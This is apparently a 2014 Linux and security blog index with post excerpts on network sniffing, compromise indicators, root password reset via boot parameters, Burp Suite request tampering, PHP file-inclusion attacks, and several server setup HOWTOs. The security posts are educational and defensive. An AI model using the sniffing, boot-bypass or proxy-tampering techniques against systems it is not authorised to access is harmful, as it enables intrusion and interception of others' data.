Sniffing the Network

December 14th, 2014

This article is intended to provide a simple demonstration of how easy it is to sniff/intercept traffic on various types of networks, and serve as a warning to utilize secure methods of communication on a) untrusted networks and b) known networks with the potential for untrusted clients or administrators.

The first consideration is the topology of the network we’re connected to. To consider 5 common scenarios:

  1. Wired ethernet hub network: Hubs are becoming more and more obsolete as they are changed to switches. Multiple devices can be connected to a hub, and any data received by the hub from one device is broadcast out to all other devices. This means that all devices receive all network traffic. Not only is this an inefficient use of bandwidth, but each device is trusted to accept traffic destined for itself and to ignore traffic destined for another node. To sniff such a network, a node simply needs to switch it’s network interface card to “promiscuous mode”, meaning that it accepts all traffic received.
  2. Wired ethernet switched network: Multiple devices can be connected to a switch, however a switch has greater intelligence than a hub. The switch will inspect the traffic sent on each port, and learn the hardware (MAC) address of the client connected to a particular port. Once learned, the switch will inspect any frames it receives on a port, and forward that frame to the known recipient’s port alone. Other devices connected to the switch will not receive traffic that is not destined for them. This offers enhanced bandwidth usage over a hub. Switches rely on ARP packets which are easily forged in order to learn which devices are on which ports.
  3. Wireless open networks: Multiple devices can connect to an open wireless network. All data is broadcast across the network in plain text, and any attacker can sniff/intercept traffic being broadcast across the network. An open wireless network may present the user with a form of hotspot login page before granting internet access, however this does not detract from the network itself being open.
  4. WEP encrypted wireless network: A WEP encrypted network requires a WEP key to encrypt and decrypt network traffic. WEP has long been an outdated and insecure method of wireless network protection, and cracking a wireless network’s WEP key is fast and requires low skill. WEP is not secure. In addition, all clients connected to the network use the same WEP key to connect. That results in any user on the network with the WEP key being table to view any traffic transmitted to and from other nodes on the network.
  5. WPA/WPA2 encrypted network: A WPA/WPA2 encrypted network is significantly more secure than a WEP network. Whilst attacks exist on parts of the protocol, and extensions such as WPS, no known attack is able to recover a complex WPA/WPA2 password within an acceptable period of time. Whilst all clients connect to the network with the same password, the protocol is engineered to create different keystreams between each connected client and the access point. This means that simple sniffing in the traditional sense is not possible on the network.

Read the rest of this entry »

Linux: You may have been Compromised when..

December 9th, 2014

There are a number of warning signs that a system has been compromised. The cases below warrant further investigation. Of course, they aren’t all guarantees that your system has been compromised, however they can be strong indicators.

1. Your welcome banner shows the last log in from an unknown/foreign IP address:

Last login: Tue Dec  2 16:08:41 2014 from 190.234.106.143
root@mt:~#

2. The load on a usually idle system is suspiciously high:

root@mt:~# w
 17:06:39 up 62 days, 22:37,  1 user,  load average: 8.12, 8.14, 8.11
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    pwn              17:03    7.00s  0.00s  0.00s w

This could indicate that unknown processes are running.
Read the rest of this entry »

Reset Linux Root Password

December 6th, 2014

There are a couple of reasons why you might want to reset a Linux root password. If the current password is known to you, just log in as root and issue the passwd command. What if you’ve forgotten the password and can’t log in? Resetting a Linux root password is simple if you have access to the machine. There are 2 main methods.

Method #1

First, we boot the machine up. If LILO is in use, enter linux init=/bin/bash at the ‘LILO:’ prompt. If GRUB is in use, then press key ‘e’. We’ll need to edit the kernel line, beginning ‘linux’, and append init=/bin/sh:

Boot Step #3 Boot Step #1 Boot Step #2

 
Read the rest of this entry »

Burp Suite: Intercepting & Modifying HTTP Requests & Responses

December 3rd, 2014

Burp Suite is a powerful web application auditor with a huge range of features, from simple to advanced. One of its core features is an intercepting proxy server. This allows us to pass our web traffic through burp suite, allowing us to view and modify both our browsers request before it goes to the remote web server, and the web server’s response before it returns to our browser.

A couple common request modifications:

  • Add data to form submissions, modify hidden fields.
  • View and modify browser AJAX data
  • View and edit headers including cookies

And a couple of common response modifications:

  • Remove client side JavaScript (usually validations or other limitations)
  • Add or remove cookies sent to the browser

First, fire up Burp Suite, and browse to Proxy –> Options:

Read the rest of this entry »

Linux Namespaces

November 23rd, 2014

Starting from kernel 2.6.24, there are 6 different types of Linux namespaces. Namespaces are useful in isolating processes from the rest of the system, without needing to use full low level virtualization technology.

  • CLONE_NEWIPC: IPC Namespaces: SystemV IPC and POSIX Message Queues can be isolated.
  • CLONE_NEWPID: PID Namespaces: PIDs are isolated, meaning that a PID inside of the namespace can conflict with a PID outside of the namespace. PIDs inside the namespace will be mapped to other PIDs outside of the namespace. The first PID inside the namespace will be ‘1’ which outside of the namespace is assigned to init
  • CLONE_NEWNET: Network Namespaces: Networking (/proc/net, IPs, interfaces and routes) are isolated. Services can be run on the same ports within namespaces, and “duplicate” virtual interfaces can be created.
  • CLONE_NEWNS: Mount Namespaces. We have the ability to isolate mount points as they appear to processes. Using mount namespaces, we can achieve similar functionality to chroot() however with improved security.
  • CLONE_NEWUTS: UTS Namespaces. This namespaces primary purpose is to isolate the hostname and NIS name.
  • CLONE_NEWUSER: User Namespaces. Here, user and group IDs are different inside and outside of namespaces and can be duplicated.

Let’s look first at the structure of a C program, required to demonstrate process namespaces. The following has been tested on Debian 6 and 7.

First, we need to allocate a page of memory on the stack, and set a pointer to the end of that memory page. We use alloca to allocate stack memory rather than malloc which would allocate memory on the heap.

void *mem = alloca(sysconf(_SC_PAGESIZE)) + sysconf(_SC_PAGESIZE);

Next, we use clone to create a child process, passing the location of our child stack ‘mem’, as well as the required flags to specify a new namespace. We specify ‘callee’ as the function to execute within the child space:

mypid = clone(callee, mem, SIGCHLD | CLONE_NEWIPC | CLONE_NEWPID | CLONE_NEWNS | CLONE_FILES, NULL);

After calling clone we then wait for the child process to finish, before terminating the parent. If not, the parent execution flow will continue and terminate immediately after, clearing up the child with it:

while (waitpid(mypid, &r, 0) < 0 && errno == EINTR)
{
	continue;
}

Lastly, we’ll return to the shell with the exit code of the child:

if (WIFEXITED(r))
{
	return WEXITSTATUS(r);
}
return EXIT_FAILURE;

Now, let’s look at the callee function:

static int callee()
{
	int ret;
	mount("proc", "/proc", "proc", 0, "");
	setgid(u);
	setgroups(0, NULL);
	setuid(u);
	ret = execl("/bin/bash", "/bin/bash", NULL);
	return ret;
}

Here, we mount a /proc filesystem, and then set the uid (User ID) and gid (Group ID) to the value of ‘u’ before spawning the /bin/bash shell.
Read the rest of this entry »

Hard Drive Data Recovery

November 13th, 2014

This article discusses hard disk data recovery on Linux using dd and fdisk.

I recently left for a trip to South America, and took my trusty Intenso 320GB external drive with. Well aware that I’ve dropped it a couple too many times and that it was beginning to click more and more often during regular usage, I took a full backup before leaving. There’s nothing critical on the drive that I don’t have additional copies of elsewhere, however losing it would be a pain.

Having reached Madrid airport, I plugged the drive in and was about to pull some documents off it when disaster struck. The drive just clicked for about 30 seconds before Windows prompted me to format it. I tried removing it and reinserting it a couple of times but no luck – the drive had failed. I went to the duty free store in the airport and picked up a 1Tb WD Elements drive for 99 Euros, and planned to attempt data recovery when I arrived in South America.

I’m keen to get the data recovery started – it’s going to take a while on my USB 2.0 laptop and the more bad sectors, the longer it will take.

Read the rest of this entry »

Nginx, SSL & php5-fpm on Debian Wheezy

October 11th, 2014

I decided to take a break from my love affair with Apache and set up a recent development project on Nginx. I’ve seen nothing but good things in terms of speed and performance from Nginx. I decided to set up a LEMP server (Linux, Nginx, MySQL, PHP), minus the MySQL as it’s already installed on my VM host server, and plus SSL. Here’s the full setup tutorial on Debian Wheezy:

Step #1 – Installing the packages

apt-get install nginx-extras mysql-client
apt-get install php5-fpm php5-gd php5-mysql php-apc php-pear php5-cli php5-common php5-curl php5-mcrypt php5-cgi php5-memcached

MySQL can be installed into the mix with a simple:

apt-get install mysql-server

Read the rest of this entry »

Debian Wheezy Xen + Guest Howto

October 8th, 2014

Xen is usually my go to virtualization technology for Linux. Here’s a HOWTO on setting up Xen on Debian Wheezy and the first guest virtual machine.

First step is getting the required packages:

apt-get install xen-linux-system xen-tools xen-utils-4.1 xen-utils-common xenstore-utils xenwatch

Now, we’ll need to specify the Xen kernel as the default boot kernel on the host, and then reboot:
Read the rest of this entry »

MySQL Master-Master Replication, Heartbeat, DRBD, Apache, PHP, Varnish MegaHOWTO

October 8th, 2014

I created this HOWTO while building a new development environment today. The intention is to take a single Apache2/Varnish/MySQL environment and scale it to two servers, with one effectively a “hot-standby” – increase redundancy and continuity whilst maintaining current performance. This HOWTO is based on Linux Debian-76-wheezy-64-minimal 3.2.0-4-amd64 #1 SMP Debian 3.2.60-1+deb7u3 x86_64

Our current server has IP 192.168.201.1/24 and our new server has IP 192.168.201.7.

Section #1: Set up MySQL Master/Master Replication


First, we’ll set up MySQL master to master replication. In this configuration, data can be written and read from either host. Bear in mind that issues may exist with autoincrement fields when written to at the same time. There are other caveats with replication so ensure to research them along with how to deal with corruption and repair before considering this setup for a live application. Also be sure to be using the same version of MySQL on both servers – this may not always be necessary, however unless you are very familiar with any changes between versions, not doing so could spell disaster.

Read the rest of this entry »

Linux Challenge Blackbox #1

October 5th, 2014

I put together a small blackbox challenge this afternoon. Download it now:

Challenge starts here

The challenge covers some Linux file manipulation, C/ASM, GDB and filesystem. Please post questions or feedback in the comments. No spoilers! If you’ve got the master password, contact me privately through the form and if you’re correct I’ll post your details here.

Update 6th Oct 14:00 GMT

I’ve received a lot of questions and clarifications. Here are some hints for the first part.. πŸ™‚

  1. Β The download file is hidden on this page. It’s not hard to find!
  2. Linux “file” command is helpful
  3. Make sure you have GDB installed and know how to use it

And for the second part…

  1. I <3 AES 256!

The final key is a 16 byte string padded out to 32 bytes.

The challenge has now been solved, and an excellent and very detailed solution posted by Reader Remi Pommarel (repk at triplefau dot lt). Here is Remi’s solution:

Spoiler Inside: Challenge Solution SelectShow

Please feel free to submit your own solutions!

Linux iproute2 multiple default gateways

October 5th, 2014

This article describes a Linux server set up with 2 interfaces (eth0) and (eth1). Each interface has a separate ISP, network details and default gateway. eth0 has two sets of network details on the same interface and so a virtual interface (eth0:0) must be created to handle the second IP.

By default, Linux only allows for one default gateway. Let’s see what happens if we try to use multiple uplinks with 1 default gateway. Assume eth0 is assigned 192.168.1.2/24 and eth1 is assigned 172.16.1.5/16. Let’s say our default gateway is 192.168.1.1 (which of course is found through eth0) but there’s also a 172.16.0.1 gateway on eth1 which we can’t enter as Linux only allows for the one.

Our routing table now looks like this:

root@www1:~# route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
0.0.0.0         192.168.1.1     0.0.0.0         UG    0      0        0 eth0
192.168.1.0     0.0.0.0         255.255.255.0   U     0      0        0 eth0
172.16.0.0      0.0.0.0         255.255.0.0     U     0      0        0 eth1

If a packet comes in to us, routed through the 172.16.0.1 gateway from say 8.8.8.8, our machine will receive it. When it tries to reply to 8.8.8.8 however, it runs down the routing table and sees that it’s not local to eth0 or eth1 and therefore will get routed out through the default gateway (192.168.1.1) – the problem is, this is the wrong gateway and so the target machine will ignore our response due to it being out of sequence and from the wrong IP.

Using iproute2, Linux can track multiple routing tables and therefore multiple default gateways. If the packet comes in through one interface and to one IP, it will go out via a specific default gateway. The script to achieve this is as follows:

Read the rest of this entry »

Debian Linux Wheezy OpenVPN & Squid3 HOWTO with Transparent Proxying

October 4th, 2014

Before my last extended period travelling and using public networks, I decided to set up a new low spec virtual machine on one of my hosted servers. I trust my datacenter and their uplinks more than I trust the free WiFi and public networks I travel through, and so while all my internet traffic is being routed over an encrypted tunnel to my dedicated server, I’m a lot happier.

I threw Squid3 into the mix, as it caches common assets and the sites I visit. This speeds up my web access and page load time.

OpenVPN can be configured more simply with a ‘static key’ configuration, however I’ve chosen to go down the PKI route for future growth. On my new VPN server I run:

apt-get install openvpn

Once OpenVPN is installed, I’ll need to set up my PKI system, certificate authority (CA), server certificate (vpn) and my first client certificate (npn)

Read the rest of this entry »

Simple Ready to Roll Linux Backup Script

September 12th, 2014

I’d built a Linux backup BASH shell script a while ago that I’ve been using, and wanted to share it today. This is a simple and easy to configure script, useful for backing up and scheduling multiple hosts, as well as handling file and MySQL backups, and flexibly allowing multiple days or copies to be retained.

The full source is available here

The global configuration is performed at the top of the script:

#config
MAIN_DIR="/home/sysbackups"
BACKUP_DIR="${MAIN_DIR}/backups"
LOG_DIR="${MAIN_DIR}/logs"

RSYNC="time nice -19 rsync"
SSH=ssh
MYSQLDUMP="time nice -19 mysqldump"
GZIP=gzip
SCP=scp
CAT=cat
RM=rm
CP=cp
RSYNC_ARGS="-arplogu --delete --stats"
TODAY=`date +%Y%m%d`
LOG="${LOG_DIR}/log_error_${TODAY}.log"

The utilities that you see listed are all required to be installed: rsync gzip scp time nice cat mysqldump.

The directory structure for backups is a master directory, which in this case is /home/sysbackups, a directory for the actual backups to be placed, in this case /home/sysbackups/backups and a directory for log files, in this case /home/sysbackups/logs. These directories should exist prior to running the script.

The usage of ‘nice’ is to ensure the backups are as resource friendly as possible, and ‘time’ allows for timing data to be provided within the log files created.

Each backup set is defined lower down in the ‘startEntry’ function. Taking the first as an example:

10 )
 STARTED=1
 START="Local: vm1"
 HOST="192.168.1.50"
 B_RSYNC_USER=root
 B_RSYNC=1
 B_RSYNC_LIMIT=4096
 B_RSYNC_DIR=( "/var/www" "/var/spool/cron" "/etc" "/home" )
 B_MYSQLDUMP=1
 B_MULTIPLEDAYS_DB=3
 B_MYSQLDUMP_USER="root"
 B_MYSQLDUMP_MYSQLUSER="root"
 B_MYSQLDUMP_PASS="password"
 B_MYSQLDUMP_HOST="127.0.0.1"
 B_MYSQLDUMP_TMP="/tmp/mysqldump-backup.sql"
 B_MYSQLDUMP_GZIPAFTER=1
 B_MYSQLDUMP_DATABASES=( "all-databases" )
 ;;

The ‘START’ variable defines the “friendly name” of the machine for log purposes, and the ‘HOST’ variable defines it’s IP or hostname.

Setting ‘B_RSYNC’ to 1 instructs the script to execute the rsync routines for file backup. Setting ‘B_MYSQLDUMP’ to 1 allows us to back up MySQL databases from on the host.

Rsync options

B_RSYNC_USER defines the SSH user to connect to the host as
B_RSYNC_LIMIT defines the limit in kbps for the transferB_RSYNC_DIR is an array of directories to back up

Mysqldump options

B_MYSQLDUMP_USER defines the SSH user to connect to the host as
B_MYSQLDUMP_MYSQLUSER and B_MYSQLDUMP_PASS define the MySQL username and password to connect with
B_MYSQLDUMP_HOST defines the MySQL host to connect to, relative to the HOST variable.
B_MYSQLDUMP_TMP defines a temporary location for the mysql backup on the host
B_MYSQLDUMP_GZIPAFTER defines whether the MySQL backups should be GZipped before being transferred
B_MYSQLDUMP_DATABASES is an array of database names to be backed up, with “all-databases” being hopefully self explanatory

B_MULTIPLEDAYS_DB defines the number of database copies to keep and B_MULTIPLEDAYS defines the number of file sets to keep.

As we have defined this backup set as case ’10’ in the script, to execute it, we simply run: /path/to/backup.script.sh 10

This can be cronned to run on a daily basis.

Lastly, as connections to hosts are made via SSH, either a password will need to be entered on each run manually, or SSH keys can be set up.

Feel free to reply with changes or comments.

Exim, DKIM and Debian Configuration

July 11th, 2014

DKIM is a system for cryptographically signing messages and confirming they were sent from a sending server authorized at domain level. A private and public key pair is generated. The private key is used to sign the messages, and the public key is published as a DNS TXT record for the domain name. This allows recipients to electronically verify that mail claiming to be from domain was actually sent by a server authorized to send mail on behalf of that domain. Implementing DKIM into a mail system increases trust and deliverability.

Setting up Exim to sign outgoing mail under DKIM (Domain Keys Identified Mail) is a reasonably quick and simple task. Assuming you’re using an up to date version of Debian with Exim4, the process is even easier.
Read the rest of this entry »

PHP Local and Remote File Inclusion (LFI, RFI) Attacks

August 15th, 2013

PHP supports the ability to ‘include’ or ‘require’ additional files within a script. If unsanitized data is passed to such functions, an attacker may be able to get remote code execution access to the server. A typical include block might look something like this:

<?php
require("config/settings.inc.php");
require("lib/db.lib.php");
require("lib/parser.lib.php");
include("contrib/users/user.contrib.php");
die("This is a test");
?>

Now, it’s also possible to dynamically require or include files based on variables or user input, say for example:
Read the rest of this entry »